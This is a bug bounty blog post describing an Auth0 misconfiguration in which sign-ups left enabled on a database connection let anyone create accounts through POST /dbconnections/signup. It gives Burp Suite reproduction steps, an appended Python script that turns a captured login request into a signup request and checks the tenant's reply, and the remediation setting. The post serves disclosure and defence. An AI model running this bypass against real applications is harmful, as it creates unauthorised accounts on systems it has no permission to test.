Auth0 Misconfig Got Me $1600 on Bugcrowd

Nauman Khan
3 min read · Apr 14, 2024


In the world of online security, even a small oversight can lead to significant vulnerabilities.

I am Nauman Khan, an independent security researcher and bug bounty hunter from Aurangabad, Maharashtra, 🇮🇳 India.

Today we'll look at a common misconfiguration in Auth0, a popular authentication platform, and what it means for the security of an application built on it.

What is Auth0?

Auth0 is an identity platform used by many websites and applications to manage user identities and control access to their services. It provides ready-made login and registration flows (hosted Universal Login, the embeddable Lock widget, and a public Authentication API) that an application integrates with instead of building its own.

The Misconfiguration:

In Auth0, user accounts for username/password login live on a database connection (the default one is called Username-Password-Authentication). Public sign-up on that connection is allowed unless its "Disable Sign Ups" option is switched on, and that option is off by default. An application that hides registration in its own UI but leaves the connection at its default has not actually disabled registration: the Authentication API will still create accounts on that connection, so the restriction can be bypassed.

(Image credit: Clear-Gate.com)

The Exploitation Process:

Reading the Auth0 Authentication API documentation, we find a public endpoint, POST /dbconnections/signup, that creates a user on a database connection. It takes the following parameters:

  • client_id: The identifier of the Auth0 application (client) the sign-up is made on behalf of; it is visible in every login request the app sends.
  • connection: The name of the database connection the account is created on (for example Username-Password-Authentication); the login request sends the same value.
  • email: The new user's email address.
  • password: The desired password, which must satisfy the connection's password policy.

Steps to Reproduce:

  • Visit the login page of the application.
  • Enter a dummy email and password in the login form.
  • Start intercepting requests with Burp Suite.
  • Click the submit button to send the login request.
  • Analyze the intercepted login request in Burp Suite and note the parameter values it carries: client_id, connection, and any others you will need.
  • Send the intercepted request to Burp's Repeater tool.
  • Change the request path from /usernamepassword/login to /dbconnections/signup, keeping the same Auth0 tenant host.
  • Rename the username parameter in the request body to email, because /dbconnections/signup identifies the new user by email (username is only an optional extra field). Login-only parameters such as redirect_uri, response_type, scope and tenant are not used by the signup endpoint and can be dropped.
  • Send the modified request to create the account. A 200 response containing an _id and the email means the user now exists on that connection.
  • Use the newly created credentials to log in to the application.
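The whole procedure in code, as an added example that is not part of the original post and is not Auth0's own tooling: it takes a constructed copy of the intercepted /usernamepassword/login body, maps it onto the /dbconnections/signup parameters, classifies the tenant's reply, and builds the Management API change that closes the hole. The tenant domain, client_id, connection name and captured body are made-up placeholders, and the way a disabled-sign-up reply is recognised (by the "Public signup is disabled" description text rather than a specific error code) is an assumption. Send it only against a tenant you are authorised to test.

```python
"""Replay an intercepted Auth0 login as a /dbconnections/signup request.

Added example for this write-up; not code from the post's author or from
Auth0. Tenant domain, client_id, connection and the captured body below
are constructed placeholders.
"""
import json
import sys
import urllib.error
import urllib.request

# Constructed sample of what Burp shows when the login form is submitted.
# Field names follow an Auth0 Lock / Universal Login POST; values are fake.
CAPTURED_LOGIN_BODY = json.dumps({
    "client_id": "AbCdEf0123456789AbCdEf0123456789",
    "redirect_uri": "https://app.example.com/callback",
    "tenant": "example-tenant",
    "response_type": "code",
    "scope": "openid profile email",
    "username": "attacker@example.com",
    "password": "Str0ng-Passw0rd!",
    "connection": "Username-Password-Authentication",
    "_csrf": "constructed-csrf-token",
})


def login_to_signup_body(login_body: str) -> dict:
    """Map the captured login JSON onto /dbconnections/signup parameters.

    Only client_id, connection and password carry over unchanged. The login
    form posts the identifier as `username`; signup requires `email`, so the
    value is moved. Login-only fields (redirect_uri, scope, tenant, _csrf,
    response_type) are dropped rather than forwarded.
    """
    login = json.loads(login_body)
    signup = {k: login[k] for k in ("client_id", "connection", "password") if k in login}
    email = login.get("email") or login.get("username")
    if not email:
        raise ValueError("captured request carries no username/email")
    signup["email"] = email
    missing = [k for k in ("client_id", "connection", "password") if k not in signup]
    if missing:
        raise ValueError(f"captured request lacks {missing}")
    return signup


def classify_signup_response(status: int, body: str) -> str:
    """Reduce the tenant's answer to SIGNUP_OPEN / SIGNUP_DISABLED / INCONCLUSIVE.

    200 with `_id` and `email` means the user now exists, i.e. sign-ups are
    open on that connection. A 400 whose description says public signup is
    disabled is the hardened state. Everything else (wrong client_id,
    password policy failure, user already exists) needs a human look.
    Assumption: the disabled case is recognised by the "Public signup is
    disabled" description text, not by a specific error code.
    """
    try:
        data = json.loads(body) if body else {}
    except json.JSONDecodeError:
        data = {}
    if not isinstance(data, dict):
        data = {}
    if status == 200 and "_id" in data and "email" in data:
        return "SIGNUP_OPEN"
    text = f"{data.get('code', '')} {data.get('description', '')}".lower()
    if status == 400 and "signup is disabled" in text:
        return "SIGNUP_DISABLED"
    return "INCONCLUSIVE"


def send_signup(tenant_domain: str, signup_body: dict) -> tuple:
    """POST the signup body to the tenant; returns (status, response text).
    Only run against a tenant you are authorised to test."""
    req = urllib.request.Request(
        f"https://{tenant_domain}/dbconnections/signup",
        data=json.dumps(signup_body).encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    try:
        with urllib.request.urlopen(req, timeout=15) as resp:
            return resp.status, resp.read().decode()
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode()


def remediation_patch(connection_id: str, current_options: dict) -> tuple:
    """Management API call that closes the hole: PATCH the database connection
    with options.disable_signup = true (the dashboard's "Disable Sign Ups").
    PATCH replaces the whole `options` object, so the caller passes the
    options fetched with GET /api/v2/connections/{id} and they are merged."""
    options = dict(current_options)
    options["disable_signup"] = True
    return "PATCH", f"/api/v2/connections/{connection_id}", {"options": options}


if __name__ == "__main__":
    domain = sys.argv[1] if len(sys.argv) > 1 else "example-tenant.us.auth0.com"
    body = login_to_signup_body(CAPTURED_LOGIN_BODY)
    print("signup body:", json.dumps(body))
    status, text = send_signup(domain, body)
    print(status, classify_signup_response(status, text), text[:200])
```

Run it as `python3 auth0_signup_check.py your-tenant.us.auth0.com` after replacing the constructed login body with the one Burp captured. SIGNUP_OPEN is the finding in this post; SIGNUP_DISABLED means the connection has been hardened; INCONCLUSIVE is usually a password-policy or duplicate-user error and says nothing about the toggle, so adjust the input and retry rather than drawing a conclusion from it.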

By following these steps, an attacker bypasses the application's intended registration controls, creates an account that was never supposed to exist, and logs in with it.

The Impact:

This misconfiguration allows unauthorized account creation, which can expose data or functionality meant only for invited or vetted users and is a useful first foothold for any further testing of authenticated features. The fix is on the Auth0 side: turn on "Disable Sign Ups" for the database connection (options.disable_signup via the Management API). Hiding the sign-up tab in the Lock widget (allowSignUp: false) only changes the UI and leaves the API open.

Written by Nauman Khan

Security Researcher | Bug Hunt3er | Junior Penetration Tester
